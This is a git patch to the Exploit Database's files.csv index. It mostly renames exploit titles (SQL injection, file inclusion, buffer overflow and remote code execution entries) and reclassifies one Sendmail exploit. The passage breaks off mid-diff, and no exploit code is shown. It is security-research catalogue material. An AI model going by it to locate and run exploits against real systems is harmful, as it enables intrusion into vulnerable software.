From 77681134f4d39913f6181eb779a321351deea1b4 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Wed, 5 Oct 2016 05:01:18 +0000 Subject: [PATCH] DB: 2016-10-05 3 new exploits CS-Cart 1.3.3 - (classes_dir) Remote File Inclusion CS-Cart 1.3.3 - 'classes_dir' Remote File Inclusion E-SMARTCART 1.0 - (Product_ID) SQL Injection E-Smart Cart 1.0 - 'Product_ID' SQL Injection E-SMART CART - 'productsofcat.asp' SQL Injection E-Smart Cart - 'productsofcat.asp' SQL Injection CS-Cart 2.0.0 Beta 3 - (Product_ID) SQL Injection CS-Cart 2.0.0 Beta 3 - 'Product_ID' SQL Injection E-Smartcart - SQL Injection E-Smart Cart - SQL Injection CubeCart PHP (shipkey parameter) 4.3.x - SQL Injection CubeCart PHP 4.3.x - 'shipkey' SQL Injection CS Cart 1.3.3 - (install.php) Cross-Site Scripting CS-Cart 1.3.3 - 'install.php' Cross-Site Scripting dansie shopping cart 3.0.4 - Multiple Vulnerabilities Dansie Shopping Cart 3.0.4 - Multiple Vulnerabilities Sendmail 8.11.6 - Address Prescan Memory Corruption Joomla! Component RSfiles (cid parameter) - SQL Injection Joomla! Component RSfiles - (cid parameter) SQL Injection Dovecot with Exim sender_address Parameter - Remote Command Execution Dovecot with Exim - sender_address Parameter Remote Command Execution Exim sender_address Parameter - Remote Code Execution Exim - sender_address Parameter Remote Code Execution PHP 4.x/5.0/5.1 with Sendmail Mail Function additional_parameters - Argument Arbitrary File Creation PHP 4.x/5.0/5.1 with Sendmail Mail Function - additional_parameters Argument Arbitrary File Creation Simplog 0.9.3 BlogID Parameter - Multiple SQL Injections Simplog 0.9.3 - BlogID Parameter Multiple SQL Injections E-SMART CART - 'Members Login' Multiple SQL Injection Vulnerabilities E-Smart Cart - 'Members Login' Multiple SQL Injection Vulnerabilities MW6 Technologies Aztec ActiveX (Data parameter) - Buffer Overflow MW6 Technologies Datamatrix - ActiveX (Data Parameter) - Buffer Overflow MW6 Technologies MaxiCode ActiveX (Data parameter) - Buffer Overflow MW6 Technologies Aztec ActiveX - (Data parameter) Buffer Overflow MW6 Technologies Datamatrix ActiveX - (Data Parameter) - Buffer Overflow MW6 Technologies MaxiCode ActiveX - (Data parameter) Buffer Overflow WordPress Plugin Recipes Blog 'id' Parameter - SQL Injection WordPress Plugin Recipes Blog - 'id' Parameter SQL Injection Le Forum 'Fichier_Acceuil' Parameter - Remote File Inclusion Le Forum - 'Fichier_Acceuil' Parameter Remote File Inclusion eFront 3.6.14.4 (surname parameter) - Persistent Cross-Site Scripting eFront 3.6.14.4 - (surname parameter) Persistent Cross-Site Scripting WordPress Plugin Safe Search 'v1' Parameter - Cross-Site Scripting WordPress Plugin Safe Search - 'v1' Parameter Cross-Site Scripting WordPress Plugin Twitter Feed 'url' Parameter - Cross-Site Scripting WordPress Plugin Twitter Feed - 'url' Parameter Cross-Site Scripting WordPress Plugin GD Star Rating 'votes' Parameter - SQL Injection WordPress Plugin GD Star Rating - 'votes' Parameter SQL Injection AJ Classifieds 'listingid' Parameter - SQL Injection AJ Classifieds - 'listingid' Parameter SQL Injection PHP Prior to 5.3.7 - Multiple Null Pointer Dereference Denial Of Service Vulnerabilities PHP < 5.3.7 - Multiple Null Pointer Dereference Denial Of Service Vulnerabilities Opera Web Browser Prior to 11.60 - Multiple Denial of Service / Unspecified Vulnerabilities Opera Web Browser < 11.60 - Multiple Denial of Service / Unspecified Vulnerabilities Bind 9 DNS Server - Denial of Service Linux Kernel 3.10.0-229.x (RHEL 7.1 / CentOS) - 'snd-usb-audio' Crash (PoC) Linux Kernel 3.10.0-229.x (RHEL 7.1 / CentOS) - 'iowarrior' Driver Crash (PoC) Linux Kernel 3.10.0-229.x (CentOS / RHEL 7.1) - 'snd-usb-audio' Crash (PoC) Linux Kernel 3.10.0-229.x (CentOS / RHEL 7.1) - 'iowarrior' Driver Crash (PoC) OpenCart 2.1.0.2 to 2.2.0.0 - json_decode Function Remote Code Execution OpenCart 2.1.0.2 < 2.2.0.0 - json_decode Function Remote Code Execution Disk Pulse Enterprise 9.0.34 - Buffer Overflow --- files.csv | 62 +++---- platforms/multiple/dos/40453.py | 201 +++++++++++++++++++++++ platforms/unix/{remote => local}/22442.c | 0 platforms/windows/remote/40452.py | 93 +++++++++++ 4 files changed, 326 insertions(+), 30 deletions(-) create mode 100755 platforms/multiple/dos/40453.py rename platforms/unix/{remote => local}/22442.c (100%) create mode 100755 platforms/windows/remote/40452.py diff --git a/files.csv b/files.csv index c7119fb68..70cf5f95d 100755 --- a/files.csv +++ b/files.csv @@ -1583,7 +1583,7 @@ id,file,description,date,author,platform,type,port 1869,platforms/php/webapps/1869.php,"DotClear 1.2.4 - (prepend.php) Arbitrary Remote File Inclusion",2006-06-03,rgod,php,webapps,0 1870,platforms/php/webapps/1870.txt,"BlueShoes Framework 4.6 - Remote File Inclusion",2006-06-03,Kacper,php,webapps,0 1871,platforms/php/webapps/1871.txt,"WebspotBlogging 3.0.1 - (path) Remote File Inclusion",2006-06-03,Kacper,php,webapps,0 -1872,platforms/php/webapps/1872.txt,"CS-Cart 1.3.3 - (classes_dir) Remote File Inclusion",2006-06-03,Kacper,php,webapps,0 +1872,platforms/php/webapps/1872.txt,"CS-Cart 1.3.3 - 'classes_dir' Remote File Inclusion",2006-06-03,Kacper,php,webapps,0 1873,platforms/asp/webapps/1873.txt,"ProPublish 2.0 - 'catid' SQL Injection",2006-06-03,FarhadKey,asp,webapps,0 1874,platforms/php/webapps/1874.php,"LifeType 1.0.4 - SQL Injection",2006-06-03,rgod,php,webapps,0 1875,platforms/php/webapps/1875.htm,"FunkBoard CF0.71 - 'profile.php' Remote User Pass Change Exploit",2006-06-04,ajann,php,webapps,0 @@ -2750,7 +2750,7 @@ id,file,description,date,author,platform,type,port 3071,platforms/windows/local/3071.c,"Microsoft Vista - (NtRaiseHardError) Privilege Escalation",2007-01-03,erasmus,windows,local,0 3072,platforms/windows/remote/3072.py,"Apple QuickTime (Windows 2000) - (rtsp URL Handler) Buffer Overflow",2007-01-03,"Winny Thomas",windows,remote,0 3073,platforms/asp/webapps/3073.txt,"LocazoList 2.01a beta5 - (subcatID) SQL Injection",2007-01-03,ajann,asp,webapps,0 -3074,platforms/asp/webapps/3074.txt,"E-SMARTCART 1.0 - (Product_ID) SQL Injection",2007-01-03,ajann,asp,webapps,0 +3074,platforms/asp/webapps/3074.txt,"E-Smart Cart 1.0 - 'Product_ID' SQL Injection",2007-01-03,ajann,asp,webapps,0 3075,platforms/php/webapps/3075.pl,"VerliAdmin 0.3 - (language.php) Local File Inclusion",2007-01-03,Kw3[R]Ln,php,webapps,0 3076,platforms/php/webapps/3076.php,"Simple Web Content Management System - SQL Injection",2007-01-03,DarkFig,php,webapps,0 3077,platforms/osx/remote/3077.rb,"Apple QuickTime 7.1.3 - (HREFTrack) Cross-Zone Scripting Exploit",2007-01-03,MoAB,osx,remote,0 @@ -5432,7 +5432,7 @@ id,file,description,date,author,platform,type,port 5802,platforms/php/webapps/5802.txt,"WebChamado 1.1 - (tsk_id) SQL Injection",2008-06-13,"Virangar Security",php,webapps,0 5803,platforms/php/webapps/5803.txt,"Pre News Manager 1.0 - (index.php id) SQL Injection",2008-06-13,K-159,php,webapps,0 5804,platforms/php/webapps/5804.txt,"Pre Ads Portal 2.0 - SQL Injection",2008-06-13,K-159,php,webapps,0 -5805,platforms/asp/webapps/5805.txt,"E-SMART CART - 'productsofcat.asp' SQL Injection",2008-06-13,JosS,asp,webapps,0 +5805,platforms/asp/webapps/5805.txt,"E-Smart Cart - 'productsofcat.asp' SQL Injection",2008-06-13,JosS,asp,webapps,0 5806,platforms/php/webapps/5806.pl,"GLLCTS2 - 'listing.php sort' Blind SQL Injection",2008-06-13,anonymous,php,webapps,0 5807,platforms/php/webapps/5807.txt,"PHP JOBWEBSITE PRO - 'JobSearch3.php' SQL Injection",2008-06-13,JosS,php,webapps,0 5808,platforms/php/webapps/5808.txt,"Mambo 4.6.4 - (Output.php) Remote File Inclusion",2008-06-13,irk4z,php,webapps,0 @@ -7705,7 +7705,7 @@ id,file,description,date,author,platform,type,port 8181,platforms/php/webapps/8181.c,"PHP Director 0.21 - (sql into outfile) eval() Injection",2009-03-09,StAkeR,php,webapps,0 8182,platforms/php/webapps/8182.txt,"PHPRecipeBook 2.24 - 'base_id' SQL Injection",2009-03-09,d3b4g,php,webapps,0 8183,platforms/php/webapps/8183.txt,"woltlab burning board 3.0.x - Multiple Vulnerabilities",2009-03-09,StAkeR,php,webapps,0 -8184,platforms/php/webapps/8184.txt,"CS-Cart 2.0.0 Beta 3 - (Product_ID) SQL Injection",2009-03-09,netsoul,php,webapps,0 +8184,platforms/php/webapps/8184.txt,"CS-Cart 2.0.0 Beta 3 - 'Product_ID' SQL Injection",2009-03-09,netsoul,php,webapps,0 8185,platforms/php/webapps/8185.txt,"phpCommunity 2.1.8 - (SQL Injection / Directory Traversal / Cross-Site Scripting) Multiple Vulnerabilities",2009-03-09,"Salvatore Fresta",php,webapps,0 8186,platforms/php/webapps/8186.txt,"PHP-Fusion Mod Book Panel - (bookid) SQL Injection",2009-03-09,elusiven,php,webapps,0 8187,platforms/hardware/dos/8187.sh,"Addonics NAS Adapter - Authenticated Denial of Service",2009-03-09,h00die,hardware,dos,0 @@ -9792,7 +9792,7 @@ id,file,description,date,author,platform,type,port 10534,platforms/php/webapps/10534.txt,"Rumba XM - Cross-Site Scripting",2009-12-17,"Hadi Kiamarsi",php,webapps,0 10535,platforms/php/webapps/10535.txt,"WordPress Plugin Pyrmont 2.x - SQL Injection",2009-12-18,Gamoscu,php,webapps,0 10537,platforms/php/webapps/10537.txt,"gpEasy 1.5RC3 - Remote File Inclusion",2009-12-18,"cr4wl3r ",php,webapps,0 -10540,platforms/asp/webapps/10540.txt,"E-Smartcart - SQL Injection",2009-12-18,R3d-D3V!L,asp,webapps,0 +10540,platforms/asp/webapps/10540.txt,"E-Smart Cart - SQL Injection",2009-12-18,R3d-D3V!L,asp,webapps,0 10542,platforms/windows/remote/10542.py,"TFTP Server 1.4 - Buffer Overflow Remote Exploit (2)",2009-12-18,Molotov,windows,remote,69 10543,platforms/php/webapps/10543.txt,"Schweizer NISADA Communication CMS - SQL Injection",2009-12-18,"Dr.0rYX AND Cr3W-DZ",php,webapps,0 10544,platforms/multiple/local/10544.html,"Mozilla Firefox - Location Bar Spoofing",2009-12-18,"Jordi Chancel",multiple,local,0 @@ -12430,7 +12430,7 @@ id,file,description,date,author,platform,type,port 14111,platforms/php/webapps/14111.txt,"Allomani - Super MultiMedia 2.5 - Cross-Site Request Forgery (Add Admin)",2010-06-29,G0D-F4Th3r,php,webapps,0 14112,platforms/php/webapps/14112.txt,"PageDirector CMS - 'result.php' SQL Injection",2010-06-29,v3n0m,php,webapps,0 14115,platforms/windows/webapps/14115.txt,"Gekko CMS - SQL Injection",2010-06-29,[]0iZy5,windows,webapps,80 -14117,platforms/multiple/webapps/14117.txt,"CubeCart PHP (shipkey parameter) 4.3.x - SQL Injection",2010-06-29,"Core Security",multiple,webapps,80 +14117,platforms/multiple/webapps/14117.txt,"CubeCart PHP 4.3.x - 'shipkey' SQL Injection",2010-06-29,"Core Security",multiple,webapps,80 30100,platforms/windows/remote/30100.html,"British TeleCommunications Consumer Webhelper 2.0.0.7 - Multiple Buffer Overflow Vulnerabilities",2007-05-29,"Will Dormann",windows,remote,0 14118,platforms/multiple/webapps/14118.txt,"LIOOSYS CMS - 'news.php' SQL Injection",2010-06-29,GlaDiaT0R,multiple,webapps,80 14119,platforms/lin_x86/shellcode/14119.c,"Linux/x86 - Polymorphic /bin/sh Shellcode (116 bytes)",2010-06-29,gunslinger_,lin_x86,shellcode,0 @@ -13062,7 +13062,7 @@ id,file,description,date,author,platform,type,port 14959,platforms/windows/local/14959.py,"Acoustica MP3 Audio Mixer 2.471 - Extended M3U directives SEH Exploit",2010-09-09,"Carlos Mario Penagos Hollmann",windows,local,0 14960,platforms/php/webapps/14960.txt,"ES Simple Download 1.0. - Local File Inclusion",2010-09-09,Kazza,php,webapps,0 14961,platforms/win_x86/local/14961.py,"Audiotran 1.4.2.4 - SEH Overflow",2010-09-09,"Abhishek Lyall",win_x86,local,0 -14962,platforms/multiple/webapps/14962.txt,"CS Cart 1.3.3 - (install.php) Cross-Site Scripting",2010-09-09,crmpays,multiple,webapps,80 +14962,platforms/multiple/webapps/14962.txt,"CS-Cart 1.3.3 - 'install.php' Cross-Site Scripting",2010-09-09,crmpays,multiple,webapps,80 14964,platforms/php/webapps/14964.txt,"Joomla! Component com_jphone - Local File Inclusion",2010-09-10,"Chip d3 bi0s",php,webapps,0 14965,platforms/php/webapps/14965.txt,"fcms 2.2.3 - Remote File Inclusion",2010-09-10,LoSt.HaCkEr,php,webapps,0 14967,platforms/windows/dos/14967.txt,"Webkit (Apple Safari < 4.1.2/5.0.2 & Google Chrome < 5.0.375.125) - Memory Corruption",2010-09-10,"Jose A. Vazquez",windows,dos,0 @@ -17221,7 +17221,7 @@ id,file,description,date,author,platform,type,port 19849,platforms/unix/remote/19849.pm,"UoW imapd 10.234/12.264 - COPY Buffer Overflow (Metasploit)",2000-04-16,vlad902,unix,remote,0 19850,platforms/linux/dos/19850.c,"RedHat Linux 6.x - X Font Server Denial of Service / Buffer Overflow Vulnerabilities",2000-04-16,"Michal Zalewski",linux,dos,0 19851,platforms/qnx/local/19851.c,"QSSL QNX 4.25 A - crypt() Exploit",2000-04-15,Sean,qnx,local,0 -19852,platforms/cgi/remote/19852.txt,"dansie shopping cart 3.0.4 - Multiple Vulnerabilities",2000-04-14,"tombow & Randy Janinda",cgi,remote,0 +19852,platforms/cgi/remote/19852.txt,"Dansie Shopping Cart 3.0.4 - Multiple Vulnerabilities",2000-04-14,"tombow & Randy Janinda",cgi,remote,0 19853,platforms/windows/dos/19853.txt,"FrontPage 97/98 - Server Image Mapper Buffer Overflow",2000-04-19,Narrow,windows,dos,0 19854,platforms/netware/dos/19854.sh,"Novell Netware 5.1 - Remote Administration Buffer Overflow",2000-04-19,"Michal Zalewski",netware,dos,0 19855,platforms/windows/local/19855.txt,"Panda Security 3.0 - Multiple Vulnerabilities",2000-04-17,Zan,windows,local,0 @@ -19725,7 +19725,7 @@ id,file,description,date,author,platform,type,port 22439,platforms/php/webapps/22439.txt,"PostNuke 0.72x Members_List Module - Full Path Disclosure",2003-03-28,rkc,php,webapps,0 22440,platforms/hardware/dos/22440.c,"D-Link DI-614+ - IP Fragment Reassembly Denial of Service",1998-04-16,humble,hardware,dos,0 22441,platforms/multiple/dos/22441.txt,"Mozilla 1.x / Opera 7.0 - LiveConnect JavaScript Denial of Service",2003-03-28,"Marc Schoenefeld",multiple,dos,0 -22442,platforms/unix/remote/22442.c,"Sendmail 8.11.6 - Address Prescan Memory Corruption",2003-03-29,sorbo,unix,remote,0 +22442,platforms/unix/local/22442.c,"Sendmail 8.11.6 - Address Prescan Memory Corruption",2003-03-29,sorbo,unix,local,0 22443,platforms/php/webapps/22443.txt,"Beanwebb Guestbook 1.0 - Unauthorized Administrative Access",2003-03-29,euronymous,php,webapps,0 22444,platforms/php/webapps/22444.txt,"Justice Guestbook 1.3 - Full Path Disclosure",2003-03-29,euronymous,php,webapps,0 22445,platforms/php/webapps/22445.txt,"ScozBook 1.1 - Full Path Disclosure",2003-03-29,euronymous,php,webapps,0 @@ -22051,7 +22051,7 @@ id,file,description,date,author,platform,type,port 24848,platforms/linux/remote/24848.txt,"ChBg 1.5 - Scenario File Overflow",2004-12-15,"Danny Lungstrom",linux,remote,0 24849,platforms/php/webapps/24849.txt,"DaloRadius - Multiple Vulnerabilities",2013-03-18,"Saadi Siddiqui",php,webapps,0 24850,platforms/php/webapps/24850.txt,"WordPress Plugin Simply Poll 1.4.1 - Multiple Vulnerabilities",2013-03-18,m3tamantra,php,webapps,0 -24851,platforms/php/webapps/24851.txt,"Joomla! Component RSfiles (cid parameter) - SQL Injection",2013-03-18,ByEge,php,webapps,0 +24851,platforms/php/webapps/24851.txt,"Joomla! Component RSfiles - (cid parameter) SQL Injection",2013-03-18,ByEge,php,webapps,0 24855,platforms/php/dos/24855.txt,"PHP 3/4/5 - Multiple Local And Remote Vulnerabilities (2)",2004-12-15,Slythers,php,dos,0 24856,platforms/linux/remote/24856.c,"NapShare 1.2 - Remote Buffer Overflow (1)",2004-12-06,"Bartlomiej Sieka",linux,remote,0 24857,platforms/linux/remote/24857.c,"NapShare 1.2 - Remote Buffer Overflow (2)",2004-12-10,"Bartlomiej Sieka",linux,remote,0 @@ -22481,7 +22481,7 @@ id,file,description,date,author,platform,type,port 25775,platforms/linux/remote/25775.rb,"Nginx 1.3.9 < 1.4.0 - Chuncked Encoding Stack Buffer Overflow (Metasploit)",2013-05-28,Metasploit,linux,remote,80 25295,platforms/hardware/dos/25295.txt,"Huawei SNMPv3 Service - Multiple Buffer Overflow Vulnerabilities",2013-05-07,"Roberto Paleari",hardware,dos,0 25296,platforms/windows/local/25296.rb,"AudioCoder - '.m3u' Buffer Overflow (Metasploit)",2013-05-07,Metasploit,windows,local,0 -25297,platforms/linux/remote/25297.txt,"Dovecot with Exim sender_address Parameter - Remote Command Execution",2013-05-07,"RedTeam Pentesting GmbH",linux,remote,0 +25297,platforms/linux/remote/25297.txt,"Dovecot with Exim - sender_address Parameter Remote Command Execution",2013-05-07,"RedTeam Pentesting GmbH",linux,remote,0 25298,platforms/php/webapps/25298.txt,"b2evolution 4.1.6 - Multiple Vulnerabilities",2013-05-07,"High-Tech Bridge SA",php,webapps,80 25299,platforms/php/webapps/25299.txt,"Tkai's Shoutbox - Query Parameter URI redirection",2005-03-28,CorryL,php,webapps,0 25300,platforms/php/webapps/25300.txt,"EXoops - Multiple Input Validation Vulnerabilities",2005-03-28,"Diabolic Crab",php,webapps,0 @@ -23164,7 +23164,7 @@ id,file,description,date,author,platform,type,port 25967,platforms/hardware/dos/25967.txt,"Cisco CallManager 1.0/2.0/3.x/4.0 - CTI Manager Remote Denial of Service",2005-07-12,"Jeff Fay",hardware,dos,0 25968,platforms/hardware/webapps/25968.pl,"Seowonintech Routers fw: 2.3.9 - Remote Root File Disclosure",2013-06-05,"Todor Donev",hardware,webapps,0 25969,platforms/hardware/webapps/25969.txt,"Netgear WPN824v3 - Unauthorized Config Download",2013-06-05,"Jens Regel",hardware,webapps,0 -25970,platforms/linux/remote/25970.py,"Exim sender_address Parameter - Remote Code Execution",2013-06-05,eKKiM,linux,remote,0 +25970,platforms/linux/remote/25970.py,"Exim - sender_address Parameter Remote Code Execution",2013-06-05,eKKiM,linux,remote,0 25971,platforms/php/webapps/25971.txt,"Cuppa CMS - 'alertConfigField.php urlConfig Parameter' Remote / Local File Inclusion",2013-06-05,"CWH Underground",php,webapps,0 25972,platforms/windows/dos/25972.py,"PEStudio 3.69 - Denial of Service",2013-06-05,"Debasish Mandal",windows,dos,0 25973,platforms/php/webapps/25973.txt,"Ruubikcms 1.1.1 - (tinybrowser.php folder Parameter) Directory Traversal",2013-06-05,expl0i13r,php,webapps,0 @@ -24513,7 +24513,7 @@ id,file,description,date,author,platform,type,port 27331,platforms/php/webapps/27331.txt,"n8cms 1.1/1.2 - 'index.php' Multiple Parameter Cross-Site Scripting",2006-02-27,Liz0ziM,php,webapps,0 27332,platforms/php/webapps/27332.txt,"n8cms 1.1/1.2 - mailto.php userid Parameter Cross-Site Scripting",2006-02-27,Liz0ziM,php,webapps,0 27333,platforms/php/webapps/27333.txt,"QwikiWiki 1.4 - 'index.php' Cross-Site Scripting",2006-02-28,Dr^Death,php,webapps,0 -27334,platforms/php/local/27334.txt,"PHP 4.x/5.0/5.1 with Sendmail Mail Function additional_parameters - Argument Arbitrary File Creation",2006-02-28,ced.clerget@free.fr,php,local,0 +27334,platforms/php/local/27334.txt,"PHP 4.x/5.0/5.1 with Sendmail Mail Function - additional_parameters Argument Arbitrary File Creation",2006-02-28,ced.clerget@free.fr,php,local,0 27335,platforms/php/local/27335.txt,"PHP 4.x/5.0/5.1 - mb_send_mail() Function Parameter Restriction Bypass",2006-02-28,ced.clerget@free.fr,php,local,0 27336,platforms/php/webapps/27336.txt,"EJ3 TOPo 2.2.178 - Inc_header.php Cross-Site Scripting",2006-02-28,"Yunus Emre Yilmaz",php,webapps,0 27337,platforms/php/webapps/27337.txt,"Mozilla Thunderbird 1.5 - Multiple Remote Information Disclosure Vulnerabilities",2006-02-28,Crashfr,php,webapps,0 @@ -26005,7 +26005,7 @@ id,file,description,date,author,platform,type,port 28903,platforms/php/webapps/28903.txt,"ac4p Mobile - send.php cats Parameter Cross-Site Scripting",2006-11-03,AL-garnei,php,webapps,0 28904,platforms/php/webapps/28904.txt,"ac4p Mobile - up.php Multiple Parameter Cross-Site Scripting",2006-11-03,AL-garnei,php,webapps,0 28905,platforms/php/webapps/28905.txt,"ac4p Mobile - cp/index.php pagenav Parameter Cross-Site Scripting",2006-11-03,AL-garnei,php,webapps,0 -28906,platforms/php/webapps/28906.txt,"Simplog 0.9.3 BlogID Parameter - Multiple SQL Injections",2006-11-03,"Benjamin Moss",php,webapps,0 +28906,platforms/php/webapps/28906.txt,"Simplog 0.9.3 - BlogID Parameter Multiple SQL Injections",2006-11-03,"Benjamin Moss",php,webapps,0 28907,platforms/php/webapps/28907.txt,"Simplog 0.9.3 - archive.php PID Parameter Cross-Site Scripting",2006-11-03,"Benjamin Moss",php,webapps,0 28908,platforms/php/webapps/28908.txt,"Advanced Guestbook 2.3.1 - admin.php Remote File Inclusion",2006-11-03,BrokeN-ProXy,php,webapps,0 28909,platforms/php/webapps/28909.txt,"IF-CMS - 'index.php' Cross-Site Scripting",2006-11-04,"Benjamin Moss",php,webapps,0 @@ -28015,7 +28015,7 @@ id,file,description,date,author,platform,type,port 31056,platforms/windows/remote/31056.py,"Rejetto HTTP File Server (HFS) 1.5/2.x - Multiple Security Vulnerabilities",2008-01-23,"Felipe M. Aragon",windows,remote,0 31057,platforms/osx/dos/31057.html,"Apple iOS Mobile Safari - Memory Exhaustion Remote Denial of Service",2008-01-24,fuzion,osx,dos,0 31058,platforms/asp/webapps/31058.txt,"Pre Hotel and Resorts - 'user_login.asp' Multiple SQL Injection Vulnerabilities",2008-01-25,milad_sa2007,asp,webapps,0 -31059,platforms/asp/webapps/31059.txt,"E-SMART CART - 'Members Login' Multiple SQL Injection Vulnerabilities",2008-01-25,milad_sa2007,asp,webapps,0 +31059,platforms/asp/webapps/31059.txt,"E-Smart Cart - 'Members Login' Multiple SQL Injection Vulnerabilities",2008-01-25,milad_sa2007,asp,webapps,0 31060,platforms/php/webapps/31060.txt,"Drake CMS 0.4.9 - 'index.php' Cross-Site Scripting",2008-01-25,"Omer Singer",php,webapps,0 31061,platforms/php/webapps/31061.txt,"Trixbox 2.4.2 - user/index.php Query String Cross-Site Scripting",2008-01-25,"Omer Singer",php,webapps,0 31062,platforms/php/webapps/31062.txt,"Trixbox 2.4.2 - maint/index.php Query String Cross-Site Scripting",2008-01-25,"Omer Singer",php,webapps,0 @@ -28133,9 +28133,9 @@ id,file,description,date,author,platform,type,port 31173,platforms/php/webapps/31173.txt,"pChart 2.1.3 - Multiple Vulnerabilities",2014-01-24,"Balazs Makany",php,webapps,80 31174,platforms/php/webapps/31174.txt,"Joomla! Extension Komento 1.7.2 - Persistent Cross-Site Scripting",2014-01-24,"High-Tech Bridge SA",php,webapps,80 31175,platforms/php/webapps/31175.txt,"Joomla! Extension JV Comment 3.0.2 - (index.php id Parameter) SQL Injection",2014-01-24,"High-Tech Bridge SA",php,webapps,80 -31176,platforms/windows/dos/31176.html,"MW6 Technologies Aztec ActiveX (Data parameter) - Buffer Overflow",2014-01-24,"Pedro Ribeiro",windows,dos,0 -31177,platforms/windows/dos/31177.html,"MW6 Technologies Datamatrix - ActiveX (Data Parameter) - Buffer Overflow",2014-01-24,"Pedro Ribeiro",windows,dos,0 -31178,platforms/windows/dos/31178.html,"MW6 Technologies MaxiCode ActiveX (Data parameter) - Buffer Overflow",2014-01-24,"Pedro Ribeiro",windows,dos,0 +31176,platforms/windows/dos/31176.html,"MW6 Technologies Aztec ActiveX - (Data parameter) Buffer Overflow",2014-01-24,"Pedro Ribeiro",windows,dos,0 +31177,platforms/windows/dos/31177.html,"MW6 Technologies Datamatrix ActiveX - (Data Parameter) - Buffer Overflow",2014-01-24,"Pedro Ribeiro",windows,dos,0 +31178,platforms/windows/dos/31178.html,"MW6 Technologies MaxiCode ActiveX - (Data parameter) Buffer Overflow",2014-01-24,"Pedro Ribeiro",windows,dos,0 31179,platforms/windows/remote/31179.html,"Daum Game 1.1.0.5 - ActiveX (IconCreate Method) Stack Buffer Overflow",2014-01-24,"Trustwave's SpiderLabs",windows,remote,0 31180,platforms/hardware/webapps/31180.txt,"Franklin Fueling TS-550 evo 2.0.0.6833 - Multiple Vulnerabilities",2014-01-24,"Trustwave's SpiderLabs",hardware,webapps,10001 31181,platforms/windows/remote/31181.rb,"HP Data Protector - Backup Client Service Directory Traversal (Metasploit)",2014-01-24,Metasploit,windows,remote,5555 @@ -28196,7 +28196,7 @@ id,file,description,date,author,platform,type,port 31225,platforms/php/webapps/31225.html,"RunCMS 1.6.1 - 'admin.php' Cross-Site Scripting",2008-02-18,NBBN,php,webapps,0 31226,platforms/php/webapps/31226.txt,"Joomla! / Mambo Component com_detail - 'id' Parameter SQL Injection",2008-02-18,S@BUN,php,webapps,0 31227,platforms/php/webapps/31227.txt,"Yellow Swordfish Simple Forum 1.x - 'sf-profile.php' SQL Injection",2008-02-18,S@BUN,php,webapps,0 -31228,platforms/php/webapps/31228.txt,"WordPress Plugin Recipes Blog 'id' Parameter - SQL Injection",2008-02-18,S@BUN,php,webapps,0 +31228,platforms/php/webapps/31228.txt,"WordPress Plugin Recipes Blog - 'id' Parameter SQL Injection",2008-02-18,S@BUN,php,webapps,0 31229,platforms/php/webapps/31229.txt,"ProjectPier 0.8 - Multiple HTML Injection / Cross-Site Scripting Vulnerabilities",2008-02-18,L4teral,php,webapps,0 31230,platforms/php/webapps/31230.txt,"WordPress Plugin wp-people 2.0 - 'wp-people-popup.php' SQL Injection",2008-02-18,S@BUN,php,webapps,0 31231,platforms/windows/remote/31231.txt,"SIMM-Comm SCI Photo Chat 3.4.9 - Directory Traversal",2008-02-19,"Luigi Auriemma",windows,remote,0 @@ -28229,7 +28229,7 @@ id,file,description,date,author,platform,type,port 31331,platforms/php/webapps/31331.txt,"PHP-Nuke eGallery 3.0 Module - 'pid' Parameter SQL Injection",2008-03-04,"Aria-Security Team",php,webapps,0 31332,platforms/php/webapps/31332.txt,"PHP-Nuke 'Seminars' Module - 'Filename' Parameter Local File Inclusion",2008-03-04,The-0utl4w,php,webapps,0 31333,platforms/bsd/dos/31333.txt,"BSD PPP 'pppx.conf' - Local Denial of Service",2008-03-04,sipherr,bsd,dos,0 -31528,platforms/php/webapps/31528.txt,"Le Forum 'Fichier_Acceuil' Parameter - Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 +31528,platforms/php/webapps/31528.txt,"Le Forum - 'Fichier_Acceuil' Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 31462,platforms/linux/remote/31462.c,"xine-lib - Multiple Heap Based Remote Buffer Overflow Vulnerabilities",2008-03-20,"Luigi Auriemma",linux,remote,0 31330,platforms/windows/dos/31330.txt,"Borland VisiBroker Smart Agent 08.00.00.C1.03 - Multiple Remote Vulnerabilities",2008-03-03,"Luigi Auriemma",windows,dos,0 31260,platforms/windows/remote/31260.py,"haneWIN DNS Server 1.5.3 - Buffer Overflow (SEH)",2014-01-29,"Dario Estrada",windows,remote,53 @@ -30444,7 +30444,7 @@ id,file,description,date,author,platform,type,port 33705,platforms/windows/remote/33705.txt,"Authentium Command On Demand ActiveX Control - Multiple Buffer Overflow Vulnerabilities",2010-03-04,"Nikolas Sotiriu",windows,remote,0 33706,platforms/php/webapps/33706.txt,"Drupal < 6.16 / 5.22 - Multiple Security Vulnerabilities",2010-03-04,"David Rothstein",php,webapps,0 33704,platforms/asp/webapps/33704.txt,"BBSXP 2008 - 'ShowPost.asp' Cross-Site Scripting",2010-03-04,Liscker,asp,webapps,0 -33697,platforms/php/webapps/33697.txt,"eFront 3.6.14.4 (surname parameter) - Persistent Cross-Site Scripting",2014-06-09,"shyamkumar somana",php,webapps,80 +33697,platforms/php/webapps/33697.txt,"eFront 3.6.14.4 - (surname parameter) Persistent Cross-Site Scripting",2014-06-09,"shyamkumar somana",php,webapps,80 33699,platforms/php/webapps/33699.txt,"WebTitan 4.01 (Build 68) - Multiple Vulnerabilities",2014-06-09,"SEC Consult",php,webapps,80 33700,platforms/asp/webapps/33700.txt,"DevExpress ASPxFileManager 10.2 < 13.2.8 - Directory Traversal",2014-06-09,"RedTeam Pentesting",asp,webapps,80 33702,platforms/php/webapps/33702.txt,"ZeroCMS 1.0 - (zero_view_article.php article_id Parameter) SQL Injection",2014-06-10,LiquidWorm,php,webapps,80 @@ -31678,7 +31678,7 @@ id,file,description,date,author,platform,type,port 35064,platforms/php/webapps/35064.txt,"Zimplit CMS - English_manual_version_2.php client Parameter Cross-Site Scripting",2010-12-07,"High-Tech Bridge SA",php,webapps,0 35065,platforms/asp/webapps/35065.txt,"SolarWinds Orion Network Performance Monitor (NPM) 10.1 - Multiple Cross-Site Scripting Vulnerabilities",2010-12-07,x0skel,asp,webapps,0 35066,platforms/php/webapps/35066.txt,"WordPress Plugin Processing Embed 0.5 - 'pluginurl' Parameter Cross-Site Scripting",2010-12-08,"John Leitch",php,webapps,0 -35067,platforms/php/webapps/35067.txt,"WordPress Plugin Safe Search 'v1' Parameter - Cross-Site Scripting",2010-12-08,"John Leitch",php,webapps,0 